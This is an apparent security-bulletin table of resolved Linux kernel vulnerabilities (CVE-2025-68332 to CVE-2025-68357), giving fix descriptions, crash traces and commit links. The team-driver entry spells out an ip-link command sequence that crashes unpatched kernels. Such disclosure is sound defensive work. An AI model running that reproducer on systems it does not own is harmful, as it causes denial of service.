| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: comedi: c6xdigio: Fix invalid PNP driver unregistration The Comedi low-level driver "c6xdigio" seems to be for a parallel port connected device. When the Comedi core calls the driver's Comedi "attach" handler `c6xdigio_attach()` to configure a Comedi device to use this driver, it tries to enable the parallel port PNP resources by registering a PNP driver with `pnp_register_driver()`, but ignores the return value. (The `struct pnp_driver` it uses has only the `name` and `id_table` members filled in.) The driver's Comedi "detach" handler `c6xdigio_detach()` unconditionally unregisters the PNP driver with `pnp_unregister_driver()`. It is possible for `c6xdigio_attach()` to return an error before it calls `pnp_register_driver()` and it is possible for the call to `pnp_register_driver()` to return an error (that is ignored). In both cases, the driver should not be calling `pnp_unregister_driver()` as it does in `c6xdigio_detach()`. (Note that `c6xdigio_detach()` will be called by the Comedi core if `c6xdigio_attach()` returns an error, or if the Comedi core decides to detach the Comedi device from the driver for some other reason.) The unconditional call to `pnp_unregister_driver()` without a previous successful call to `pnp_register_driver()` will cause `driver_unregister()` to issue a warning "Unexpected driver unregister!". This was detected by Syzbot [1]. Also, the PNP driver registration and unregistration should be done at module init and exit time, respectively, not when attaching or detaching Comedi devices to the driver. (There might be more than one Comedi device being attached to the driver, although that is unlikely.) Change the driver to do the PNP driver registration at module init time, and the unregistration at module exit time. Since `c6xdigio_detach()` now only calls `comedi_legacy_detach()`, remove the function and change the Comedi driver "detach" handler to `comedi_legacy_detach`. ------------------------------------------- [1] Syzbot sample crash report: Unexpected driver unregister! WARNING: CPU: 0 PID: 5970 at drivers/base/driver.c:273 driver_unregister drivers/base/driver.c:273 [inline] WARNING: CPU: 0 PID: 5970 at drivers/base/driver.c:273 driver_unregister+0x90/0xb0 drivers/base/driver.c:270 Modules linked in: CPU: 0 UID: 0 PID: 5970 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025 RIP: 0010:driver_unregister drivers/base/driver.c:273 [inline] RIP: 0010:driver_unregister+0x90/0xb0 drivers/base/driver.c:270 Code: 48 89 ef e8 c2 e6 82 fc 48 89 df e8 3a 93 ff ff 5b 5d e9 c3 6d d9 fb e8 be 6d d9 fb 90 48 c7 c7 e0 f8 1f 8c e8 51 a2 97 fb 90 <0f> 0b 90 90 5b 5d e9 a5 6d d9 fb e8 e0 f4 41 fc eb 94 e8 d9 f4 41 RSP: 0018:ffffc9000373f9a0 EFLAGS: 00010282 RAX: 0000000000000000 RBX: ffffffff8ff24720 RCX: ffffffff817b6ee8 RDX: ffff88807c932480 RSI: ffffffff817b6ef5 RDI: 0000000000000001 RBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000000 R10: 0000000000000001 R11: 0000000000000001 R12: ffffffff8ff24660 R13: dffffc0000000000 R14: 0000000000000000 R15: ffff88814cca0000 FS: 000055556dab1500(0000) GS:ffff8881249d9000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000055f77f285cd0 CR3: 000000007d871000 CR4: 00000000003526f0 Call Trace: <TASK> comedi_device_detach_locked+0x12f/0xa50 drivers/comedi/drivers.c:207 comedi_device_detach+0x67/0xb0 drivers/comedi/drivers.c:215 comedi_device_attach+0x43d/0x900 drivers/comedi/drivers.c:1011 do_devconfig_ioctl+0x1b1/0x710 drivers/comedi/comedi_fops.c:872 comedi_unlocked_ioctl+0x165d/0x2f00 drivers/comedi/comedi_fops.c:2178 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:597 [inline] __se_sys_ioctl fs/ioctl.c:583 [inline] __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_sys ---truncated--- | 2025-12-22 | not yet calculated | CVE-2025-68332 | https://git.kernel.org/stable/c/9fd8c8ad35c8d2390ce5ca2eb523c044bebdc072 https://git.kernel.org/stable/c/698149d797d0178162f394c55d4ed52aa0e0b7f6 https://git.kernel.org/stable/c/888f7e2847bcb9df8257e656e1e837828942c53b https://git.kernel.org/stable/c/72262330f7b3ad2130e800cecf02adcce3c32c77 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched_ext: Fix possible deadlock in the deferred_irq_workfn() For PREEMPT_RT=y kernels, the deferred_irq_workfn() is executed in the per-cpu irq_work/* task context and does not disable IRQs; if the rq returned by container_of() is the current CPU's rq, the following scenario may occur: lock(&rq->__lock); <Interrupt> lock(&rq->__lock); This commit uses IRQ_WORK_INIT_HARD() instead of init_irq_work() to initialize rq->scx.deferred_irq_work, so that deferred_irq_workfn() is always invoked in hard-irq context. | 2025-12-22 | not yet calculated | CVE-2025-68333 | https://git.kernel.org/stable/c/600b4379b9a7ba41340d652211fb29699da4c629 https://git.kernel.org/stable/c/a257e974210320ede524f340ffe16bf4bf0dda1e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/x86/amd/pmc: Add support for Van Gogh SoC The ROG Xbox Ally (non-X) SoC features a similar architecture to the Steam Deck. While the Steam Deck supports S3 (s2idle causes a crash), this support was dropped by the Xbox Ally, which only supports S0ix suspend. Since the handler is missing here, this causes the device to not suspend and the AMD GPU driver to crash while trying to resume afterwards due to a power hang. | 2025-12-22 | not yet calculated | CVE-2025-68334 | https://git.kernel.org/stable/c/9654c56b111cd1415aca7e77f0c63c109453c409 https://git.kernel.org/stable/c/db4a3f0fbedb0398f77b9047e8b8bb2b49f355bb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: comedi: pcl818: fix null-ptr-deref in pcl818_ai_cancel() Syzbot identified an issue [1] in pcl818_ai_cancel(), which stems from the fact that in case of early device detach via pcl818_detach(), subdevice dev->read_subdev may not have initialized its pointer to &struct comedi_async as intended. Thus, any such dereferencing of &s->async->cmd will lead to a general protection fault and kernel crash. Mitigate this problem by removing the call to pcl818_ai_cancel() from pcl818_detach() altogether. This way, if the subdevice sets up its support for async commands, everything async-related will be handled via the subdevice's own ->cancel() function in comedi_device_detach_locked() even before pcl818_detach(). If no support for asynchronous commands is provided, there is no need to cancel anything either. [1] Syzbot crash: Oops: general protection fault, probably for non-canonical address 0xdffffc0000000005: 0000 [#1] SMP KASAN PTI KASAN: null-ptr-deref in range [0x0000000000000028-0x000000000000002f] CPU: 1 UID: 0 PID: 6050 Comm: syz.0.18 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025 RIP: 0010:pcl818_ai_cancel+0x69/0x3f0 drivers/comedi/drivers/pcl818.c:762 ... Call Trace: <TASK> pcl818_detach+0x66/0xd0 drivers/comedi/drivers/pcl818.c:1115 comedi_device_detach_locked+0x178/0x750 drivers/comedi/drivers.c:207 do_devconfig_ioctl drivers/comedi/comedi_fops.c:848 [inline] comedi_unlocked_ioctl+0xcde/0x1020 drivers/comedi/comedi_fops.c:2178 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:597 [inline] ... | 2025-12-22 | not yet calculated | CVE-2025-68335 | https://git.kernel.org/stable/c/5caa40e7c6a43e08e3574f990865127705c22861 https://git.kernel.org/stable/c/d948c53dec36dafe182631457597c49c1f1df5ea https://git.kernel.org/stable/c/877adccfacb32687b90714a27cfb09f444fdfa16 https://git.kernel.org/stable/c/a51f025b5038abd3d22eed2ede4cd46793d89565 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: locking/spinlock/debug: Fix data-race in do_raw_write_lock KCSAN reports: BUG: KCSAN: data-race in do_raw_write_lock / do_raw_write_lock write (marked) to 0xffff800009cf504c of 4 bytes by task 1102 on cpu 1: do_raw_write_lock+0x120/0x204 _raw_write_lock_irq do_exit call_usermodehelper_exec_async ret_from_fork read to 0xffff800009cf504c of 4 bytes by task 1103 on cpu 0: do_raw_write_lock+0x88/0x204 _raw_write_lock_irq do_exit call_usermodehelper_exec_async ret_from_fork value changed: 0xffffffff -> 0x00000001 Reported by Kernel Concurrency Sanitizer on: CPU: 0 PID: 1103 Comm: kworker/u4:1 6.1.111 Commit 1a365e822372 ("locking/spinlock/debug: Fix various data races") has addressed most of these races, but seems to be not consistent/not complete. From do_raw_write_lock() only the debug_write_lock_after() part has been converted to WRITE_ONCE(), but not the debug_write_lock_before() part. Do it now. | 2025-12-22 | not yet calculated | CVE-2025-68336 | https://git.kernel.org/stable/c/b163a5e8c703201c905d6ec7920ed79d167e8442 https://git.kernel.org/stable/c/16b3590c0e1e615757dade098c8fbc0d4f040c76 https://git.kernel.org/stable/c/396a9270a7b90886be501611b13aa636f2e8c703 https://git.kernel.org/stable/c/c14ecb555c3ee80eeb030a4e46d00e679537f03a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted There's an issue when the file system is corrupted: ------------[ cut here ]------------ kernel BUG at fs/jbd2/transaction.c:1289! Oops: invalid opcode: 0000 [#1] SMP KASAN PTI CPU: 5 UID: 0 PID: 2031 Comm: mkdir Not tainted 6.18.0-rc1-next RIP: 0010:jbd2_journal_get_create_access+0x3b6/0x4d0 RSP: 0018:ffff888117aafa30 EFLAGS: 00010202 RAX: 0000000000000000 RBX: ffff88811a86b000 RCX: ffffffff89a63534 RDX: 1ffff110200ec602 RSI: 0000000000000004 RDI: ffff888100763010 RBP: ffff888100763000 R08: 0000000000000001 R09: ffff888100763028 R10: 0000000000000003 R11: 0000000000000000 R12: 0000000000000000 R13: ffff88812c432000 R14: ffff88812c608000 R15: ffff888120bfc000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f91d6970c99 CR3: 00000001159c4000 CR4: 00000000000006f0 Call Trace: <TASK> __ext4_journal_get_create_access+0x42/0x170 ext4_getblk+0x319/0x6f0 ext4_bread+0x11/0x100 ext4_append+0x1e6/0x4a0 ext4_init_new_dir+0x145/0x1d0 ext4_mkdir+0x326/0x920 vfs_mkdir+0x45c/0x740 do_mkdirat+0x234/0x2f0 __x64_sys_mkdir+0xd6/0x120 do_syscall_64+0x5f/0xfa0 entry_SYSCALL_64_after_hwframe+0x76/0x7e The above issue occurs with us in errors=continue mode when accompanied by storage failures. There have been many inconsistencies in the file system data. In the case of file system data inconsistency, for example, if the block bitmap of a referenced block is not set, it can lead to the situation where a block being committed is allocated and used again. As a result, the following condition will not be satisfied and will trigger BUG_ON. Of course, it is entirely possible to construct a problematic image that can trigger this BUG_ON through specific operations. In fact, I have constructed such an image and easily reproduced this issue. Therefore, J_ASSERT() holds true only under ideal conditions, but it may not necessarily be satisfied in exceptional scenarios. Using J_ASSERT() directly in abnormal situations would cause the system to crash, which is clearly not what we want. So here we directly trigger a JBD abort instead of immediately invoking BUG_ON. | 2025-12-22 | not yet calculated | CVE-2025-68337 | https://git.kernel.org/stable/c/a2a7f854d154a3e9232fec80782dad951655f52f https://git.kernel.org/stable/c/bf34c72337e40c4670cceeb79b353356933a254b https://git.kernel.org/stable/c/aa1703f3f706ea0867fb1991dcac709c9ec94cfb https://git.kernel.org/stable/c/986835bf4d11032bba4ab8414d18fce038c61bb4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: dsa: microchip: Don't free uninitialized ksz_irq If something goes wrong at setup, ksz_irq_free() can be called on uninitialized ksz_irq (for example when ksz_ptp_irq_setup() fails). It leads to freeing uninitialized IRQ numbers and/or domains. Use dsa_switch_for_each_user_port_continue_reverse() in the error path to iterate only over the fully initialized ports. | 2025-12-23 | not yet calculated | CVE-2025-68338 | https://git.kernel.org/stable/c/9428654c827fa8d38b898135d26d39ee2d544246 https://git.kernel.org/stable/c/32abbcf4379a0f851d7eb9d4389e7bf5c64bf6c0 https://git.kernel.org/stable/c/25b62cc5b22c45face094ae3e8717258e46d1d19 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: atm/fore200e: Fix possible data race in fore200e_open() Protect access to fore200e->available_cell_rate with rate_mtx lock in the error handling path of fore200e_open() to prevent a data race. The field fore200e->available_cell_rate is a shared resource used to track available bandwidth. It is concurrently accessed by fore200e_open(), fore200e_close(), and fore200e_change_qos(). In fore200e_open(), the lock rate_mtx is correctly held when subtracting vcc->qos.txtp.max_pcr from available_cell_rate to reserve bandwidth. However, if the subsequent call to fore200e_activate_vcin() fails, the function restores the reserved bandwidth by adding back to available_cell_rate without holding the lock. This introduces a race condition because available_cell_rate is a global device resource shared across all VCCs. If the error path in fore200e_open() executes concurrently with operations like fore200e_close() or fore200e_change_qos() on other VCCs, a read-modify-write race occurs. Specifically, the error path reads the rate without the lock. If another CPU acquires the lock and modifies the rate (e.g., releasing bandwidth in fore200e_close()) between this read and the subsequent write, the error path will overwrite the concurrent update with a stale value. This results in incorrect bandwidth accounting. | 2025-12-23 | not yet calculated | CVE-2025-68339 | https://git.kernel.org/stable/c/1b60f42a639999c37da7f1fbfa1ad29cf4cbdd2d https://git.kernel.org/stable/c/bd1415efbab507b9b995918105eef953013449dd https://git.kernel.org/stable/c/ed34c70d88e2b8b9bc6c3ede88751186d6c6d5d1 https://git.kernel.org/stable/c/9917ba597cf95f307778e495f71ff25a5064d167 https://git.kernel.org/stable/c/667ac868823224374f819500adc5baa2889c7bc5 https://git.kernel.org/stable/c/6610361458e7eb6502dd3182f586f91fcc218039 https://git.kernel.org/stable/c/82fca3d8a4a34667f01ec2351a607135249c9cff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: team: Move team device type change at the end of team_port_add Attempting to add a port device that is already up will expectedly fail, but not before modifying the team device header_ops. In the case of the syzbot reproducer the gre0 device is already in state UP when it attempts to add it as a port device of team0, this fails but before that header_ops->create of team0 is changed from eth_header to ipgre_header in the call to team_dev_type_check_change. Later when we end up in ipgre_header() struct ip_tunnel* points to nonsense as the private data of the device still holds a struct team. Example sequence of iproute2 commands to reproduce the hang/BUG(): ip link add dev team0 type team ip link add dev gre0 type gre ip link set dev gre0 up ip link set dev gre0 master team0 ip link set dev team0 up ping -I team0 1.1.1.1 Move team_dev_type_check_change down where all other checks have passed as it changes the dev type with no way to restore it in case one of the checks that follow it fail. Also make sure to preserve the original mtu assignment: - If port_dev is not the same type as dev, dev takes mtu from port_dev - If port_dev is the same type as dev, port_dev takes mtu from dev This is done by adding a conditional before the call to dev_set_mtu to prevent it from assigning port_dev->mtu = dev->mtu and instead letting team_dev_type_check_change assign dev->mtu = port_dev->mtu. The conditional is needed because the patch moves the call to team_dev_type_check_change past dev_set_mtu. Testing: - team device driver in-tree selftests - Add/remove various devices as slaves of team device - syzbot | 2025-12-23 | not yet calculated | CVE-2025-68340 | https://git.kernel.org/stable/c/4040b5e8963982a00aa821300cb746efc9f2947e https://git.kernel.org/stable/c/e3eed4f038214494af62c7d2d64749e5108ce6ca https://git.kernel.org/stable/c/0ae9cfc454ea5ead5f3ddbdfe2e70270d8e2c8ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: veth: reduce XDP no_direct return section to fix race As explained in commit fa349e396e48 ("veth: Fix race with AF_XDP exposing old or uninitialized descriptors") for veth there is a chance after napi_complete_done() that another CPU can manage to start another NAPI instance running veth_pool(). For NAPI this is correctly handled as the napi_schedule_prep() check will prevent multiple instances from getting scheduled, but for the remaining code in veth_pool() this can run concurrently with the newly started NAPI instance. The problem/race is that xdp_clear_return_frame_no_direct() isn't designed to be nested. Prior to commit 401cb7dae813 ("net: Reference bpf_redirect_info via task_struct on PREEMPT_RT.") the temporary BPF net context bpf_redirect_info was stored per CPU, where this wasn't an issue. Since this commit the BPF context is stored in 'current' task_struct. When running veth in threaded-NAPI mode, then the kthread becomes the storage area. Now a race exists between two concurrent veth_pool() function calls, one exiting NAPI and one running new NAPI, both using the same BPF net context. The race is when another CPU gets within the xdp_set_return_frame_no_direct() section before the exiting veth_pool() calls the clear-function xdp_clear_return_frame_no_direct(). | 2025-12-23 | not yet calculated | CVE-2025-68341 | https://git.kernel.org/stable/c/c1ceabcb347d1b0f7e70a7384ec7eff3847b7628 https://git.kernel.org/stable/c/d0bd018ad72a8a598ae709588934135017f8af52 https://git.kernel.org/stable/c/a14602fcae17a3f1cb8a8521bedf31728f9e7e39 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: can: gs_usb: gs_usb_receive_bulk_callback(): check actual_length before accessing data The URB received in gs_usb_receive_bulk_callback() contains a struct gs_host_frame. The length of the data after the header depends on the gs_host_frame hf::flags and the active device features (e.g. time stamping). Introduce a new function gs_usb_get_minimum_length() and check that we have at least received the required amount of data before accessing it. Only copy the data to that skb that has actually been received. [mkl: rename gs_usb_get_minimum_length() -> +gs_usb_get_minimum_rx_length()] | 2025-12-23 | not yet calculated | CVE-2025-68342 | https://git.kernel.org/stable/c/4ffac725154cf6a253f5e6aa0c8946232b6a0af5 https://git.kernel.org/stable/c/ad55004a3cb5b41ef78aa6c09e7bc5a489ba652b https://git.kernel.org/stable/c/fb0c7c77a7ae3a2c3404b7d0173b8739a754b513 https://git.kernel.org/stable/c/395d988f93861101ec89d0dd9e3b876ae9392a5b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: can: gs_usb: gs_usb_receive_bulk_callback(): check actual_length before accessing header The driver expects to receive a struct gs_host_frame in gs_usb_receive_bulk_callback(). Use struct_group to describe the header of the struct gs_host_frame and check that we have at least received the header before accessing any members of it. To resubmit the URB, do not dereference the pointer chain "dev->parent->hf_size_rx" but use "parent->hf_size_rx" instead. Since "urb->context" contains "parent", it is always defined, while "dev" is not defined if the URB is too short. | 2025-12-23 | not yet calculated | CVE-2025-68343 | https://git.kernel.org/stable/c/18cbce43363c9f84b90a92d57df341155eee0697 https://git.kernel.org/stable/c/3433680b759646efcacc64fe36aa2e51ae34b8f0 https://git.kernel.org/stable/c/616eee3e895b8ca0028163fcb1dce5e3e9dea322 https://git.kernel.org/stable/c/f31693dc3a584c0ad3937e857b59dbc1a7ed2b87 https://git.kernel.org/stable/c/6fe9f3279f7d2518439a7962c5870c6e9ecbadcf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: wavefront: Fix integer overflow in sample size validation The wavefront_send_sample() function has an integer overflow issue when validating sample size. The header->size field is u32 but gets cast to int for comparison with dev->freemem Fix by using unsigned comparison to avoid integer overflow. | 2025-12-24 | not yet calculated | CVE-2025-68344 | https://git.kernel.org/stable/c/5588b7c86effffa9bb55383a38800649d7b40778 https://git.kernel.org/stable/c/bca11de0a277b8baeb7d006f93b543c907b6e782 https://git.kernel.org/stable/c/1823e08f76c68b9e1d26f6d5ef831b96f61a62a0 https://git.kernel.org/stable/c/0c4a13ba88594fd4a27292853e736c6b4349823d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: hda: cs35l41: Fix NULL pointer dereference in cs35l41_hda_read_acpi() The acpi_get_first_physical_node() function can return NULL, in which case the get_device() function also returns NULL, but this value is then dereferenced without checking, so add a check to prevent a crash. Found by Linux Verification Center (linuxtesting.org) with SVACE. | 2025-12-24 | not yet calculated | CVE-2025-68345 | https://git.kernel.org/stable/c/c28946b7409b7b68fb0481ec738c8b04578b11c6 https://git.kernel.org/stable/c/343fa9800cf9870ec681e21f0a6f2157b74ae520 https://git.kernel.org/stable/c/c34b04cc6178f33c08331568c7fd25c5b9a39f66 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: dice: fix buffer overflow in detect_stream_formats() The function detect_stream_formats() reads the stream_count value directly from a FireWire device without validating it. This can lead to out-of-bounds writes when a malicious device provides a stream_count value greater than MAX_STREAMS. Fix by applying the same validation to both TX and RX stream counts in detect_stream_formats(). | 2025-12-24 | not yet calculated | CVE-2025-68346 | https://git.kernel.org/stable/c/c0a1fe1902ad23e6d48e0f68be1258ccf7a163e6 https://git.kernel.org/stable/c/932aa1e80b022419cf9710e970739b7a8794f27c https://git.kernel.org/stable/c/1e1b3207a53e50d5a66289fffc1f7d52cd9c50f9 https://git.kernel.org/stable/c/324f3e03e8a85931ce0880654e3c3eb38b0f0bba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: firewire-motu: fix buffer overflow in hwdep read for DSP events The DSP event handling code in hwdep_read() could write more bytes to the user buffer than requested, when a user provides a buffer smaller than the event header size (8 bytes). Fix by using min_t() to clamp the copy size. This ensures we never copy more than the user requested. | 2025-12-24 | not yet calculated | CVE-2025-68347 | https://git.kernel.org/stable/c/6275fd726d53a8ec724f20201cf3bd862711e17b https://git.kernel.org/stable/c/161291bac551821bba98eb4ea84c82338578d1b0 https://git.kernel.org/stable/c/cdda0d06f8650e33255f79839f188bbece44117c https://git.kernel.org/stable/c/210d77cca3d0494ed30a5c628b20c1d95fa04fb1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block: fix memory leak in __blkdev_issue_zero_pages Move the fatal signal check before bio_alloc() to prevent a memory leak when BLKDEV_ZERO_KILLABLE is set and a fatal signal is pending. Previously, the bio was allocated before checking for a fatal signal. If a signal was pending, the code would break out of the loop without freeing or chaining the just-allocated bio, causing a memory leak. This matches the pattern already used in __blkdev_issue_write_zeroes() where the signal check precedes the allocation. | 2025-12-24 | not yet calculated | CVE-2025-68348 | https://git.kernel.org/stable/c/453e4b0c84d0db1454ff0adf655d91179e6fca3a https://git.kernel.org/stable/c/7957635c679e8a01147163a3a4a1f16e1210fa03 https://git.kernel.org/stable/c/7193407bc4457212fa38ec3aff9c640e63a8dbef https://git.kernel.org/stable/c/f7e3f852a42d7cd8f1af2c330d9d153e30c8adcf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid Fixes a crash when layout is null during this call stack: write_inode -> nfs4_write_inode -> pnfs_layoutcommit_inode pnfs_set_layoutcommit relies on the lseg refcount to keep the layout around. Need to clear NFS_INO_LAYOUTCOMMIT otherwise we might attempt to reference a null layout. | 2025-12-24 | not yet calculated | CVE-2025-68349 | https://git.kernel.org/stable/c/59947dff0fb7c19c09ce6dccbcd253fd542b6c25 https://git.kernel.org/stable/c/ca2e7fdad7c683b64821c94a58b9b68733214dad https://git.kernel.org/stable/c/38694f9aae00459ab443a7dc8b3949a6b33b560a https://git.kernel.org/stable/c/e0f8058f2cb56de0b7572f51cd563ca5debce746 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: exfat: fix divide-by-zero in exfat_allocate_bitmap The variable max_ra_count can be 0 in exfat_allocate_bitmap(), which causes a divide-by-zero error in the subsequent modulo operation (i % max_ra_count), leading to a system crash. When max_ra_count is 0, it means that readahead is not used. This patch loads the bitmap without readahead. | 2025-12-24 | not yet calculated | CVE-2025-68350 | https://git.kernel.org/stable/c/88fc3dd6e631b3e2975f898c6c2b6bc6f7058b44 https://git.kernel.org/stable/c/d70a5804c563b5e34825353ba9927509df709651 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: exfat: fix refcount leak in exfat_find Fix refcount leaks in `exfat_find` related to `exfat_get_dentry_set`. Function `exfat_get_dentry_set` would increase the reference counter of `es->bh` on success. Therefore, `exfat_put_dentry_set` must be called after `exfat_get_dentry_set` to ensure refcount consistency. This patch relocates two checks to avoid possible leaks. | 2025-12-24 | not yet calculated | CVE-2025-68351 | https://git.kernel.org/stable/c/d009ff8959d28d2a33aeb96a5f7e7161c421d78f https://git.kernel.org/stable/c/9aee8de970f18c2aaaa348e3de86c38e2d956c1d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: ch341: fix out-of-bounds memory access in ch341_transfer_one Discovered by Atuin - Automated Vulnerability Discovery Engine. The 'len' variable is calculated as 'min(32, trans->len + 1)', which includes the 1-byte command header. When copying data from 'trans->tx_buf' to 'ch341->tx_buf + 1', using 'len' as the length is incorrect because: 1. It causes an out-of-bounds read from 'trans->tx_buf' (which has size 'trans->len', i.e., 'len - 1' in this context). 2. It can cause an out-of-bounds write to 'ch341->tx_buf' if 'len' is CH341_PACKET_LENGTH (32). Writing 32 bytes to ch341->tx_buf + 1 overflows the buffer. Fix this by copying 'len - 1' bytes. | 2025-12-24 | not yet calculated | CVE-2025-68352 | https://git.kernel.org/stable/c/cad6c0fd6f3c0e76a1f75df4bce3b08a13f08974 https://git.kernel.org/stable/c/ea1e43966cd03098fcd5f0d72e6c2901d45fa08d https://git.kernel.org/stable/c/81841da1f30f66a850cc8796d99ba330aad9d696 https://git.kernel.org/stable/c/545d1287e40a55242f6ab68bcc1ba3b74088b1bc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: vxlan: prevent NULL deref in vxlan_xmit_one Neither sock4 nor sock6 pointers are guaranteed to be non-NULL in vxlan_xmit_one, e.g. if the iface is brought down. This can lead to the following NULL dereference: BUG: kernel NULL pointer dereference, address: 0000000000000010 Oops: Oops: 0000 [#1] SMP NOPTI RIP: 0010:vxlan_xmit_one+0xbb3/0x1580 Call Trace: vxlan_xmit+0x429/0x610 dev_hard_start_xmit+0x55/0xa0 __dev_queue_xmit+0x6d0/0x7f0 ip_finish_output2+0x24b/0x590 ip_output+0x63/0x110 Mentioned commits changed the code path in vxlan_xmit_one and as a side effect the sock4/6 pointer validity checks in vxlan(6)_get_route were lost. Fix this by adding back checks. Since both commits being fixed were released in the same version (v6.7) and are strongly related, bundle the fixes in a single commit. | 2025-12-24 | not yet calculated | CVE-2025-68353 | https://git.kernel.org/stable/c/4ac26aafdc8c7271414e2e7c0b2cb266a26591bc https://git.kernel.org/stable/c/1f73a56f986005f0bc64ed23873930e2ee4f5911 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regulator: core: Protect regulator_supply_alias_list with regulator_list_mutex regulator_supply_alias_list was accessed without any locking in regulator_supply_alias(), regulator_register_supply_alias(), and regulator_unregister_supply_alias(). Concurrent registration, unregistration and lookups can race, leading to: 1 use-after-free if an alias entry is removed while being read, 2 duplicate entries when two threads register the same alias, 3 inconsistent alias mappings observed by consumers. Protect all traversals, insertions and deletions on regulator_supply_alias_list with the existing regulator_list_mutex. | 2025-12-24 | not yet calculated | CVE-2025-68354 | https://git.kernel.org/stable/c/a9864d42ebcdd394ebb864643b961b36e7b515be https://git.kernel.org/stable/c/431a1d44ad4866362cc28fc1cc4ca93d84989239 https://git.kernel.org/stable/c/64099b5c0aeb70bc7cd5556eb7f59c5b4a5010bf https://git.kernel.org/stable/c/0cc15a10c3b4ab14cd71b779fd5c9ca0cb2bc30d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix exclusive map memory leak When excl_prog_hash is 0 and excl_prog_hash_size is non-zero, the map also needs to be freed. Otherwise, the map memory will not be reclaimed, just like the memory leak problem reported by syzbot [1]. syzbot reported: BUG: memory leak backtrace (crc 7b9fb9b4): map_create+0x322/0x11e0 kernel/bpf/syscall.c:1512 __sys_bpf+0x3556/0x3610 kernel/bpf/syscall.c:6131 | 2025-12-24 | not yet calculated | CVE-2025-68355 | https://git.kernel.org/stable/c/f0022551745d72fc0e7bc8601234d690dee2178d https://git.kernel.org/stable/c/688b745401ab16e2e1a3b504863f0a45fd345638 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gfs2: Prevent recursive memory reclaim Function new_inode() returns a new inode with inode->i_mapping->gfp_mask set to GFP_HIGHUSER_MOVABLE. This value includes the __GFP_FS flag, so allocations in that address space can recurse into filesystem memory reclaim. We don't want that to happen because it can consume a significant amount of stack memory. Worse than that is that it can also deadlock: for example, in several places, gfs2_unstuff_dinode() is called inside filesystem transactions. This calls filemap_grab_folio(), which can allocate a new folio, which can trigger memory reclaim. If memory reclaim recurses into the filesystem and starts another transaction, a deadlock will ensue. To fix these kinds of problems, prevent memory reclaim from recursing into filesystem code by making sure that the gfp_mask of inode address spaces doesn't include __GFP_FS. The "meta" and resource group address spaces were already using GFP_NOFS as their gfp_mask (which doesn't include __GFP_FS). The default value of GFP_HIGHUSER_MOVABLE is less restrictive than GFP_NOFS, though. To avoid being overly limiting, use the default value and only knock off the __GFP_FS flag. I'm not sure if this will actually make a difference, but it also shouldn't hurt. This patch is loosely based on commit ad22c7a043c2 ("xfs: prevent stack overflows from page cache allocation"). Fixes xfstest generic/273. | 2025-12-24 | not yet calculated | CVE-2025-68356 | https://git.kernel.org/stable/c/edb2b255618621dc83d0ec23150e16b2c697077f https://git.kernel.org/stable/c/9c0960ed112398bdb6c60ccf6e6b583bc59acede https://git.kernel.org/stable/c/49e7347f4644d031306d56cb4d51e467cbdcbc69 https://git.kernel.org/stable/c/2c5f4a53476e3cab70adc77b38942c066bd2c17c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iomap: allocate s_dio_done_wq for async reads as well Since commit 222f2c7c6d14 ("iomap: always run error completions in user context"), read error completions are deferred to s_dio_done_wq. This means the workqueue also needs to be allocated for async reads. | 2025-12-24 | not yet calculated | CVE-2025-68357 | https://git.kernel.org/stable/c/c67775cf0da2407f113c1229e350758f4dca0f51 https://git.kernel.org/stable/c/7fd8720dff2d9c70cf5a1a13b7513af01952ec02 |
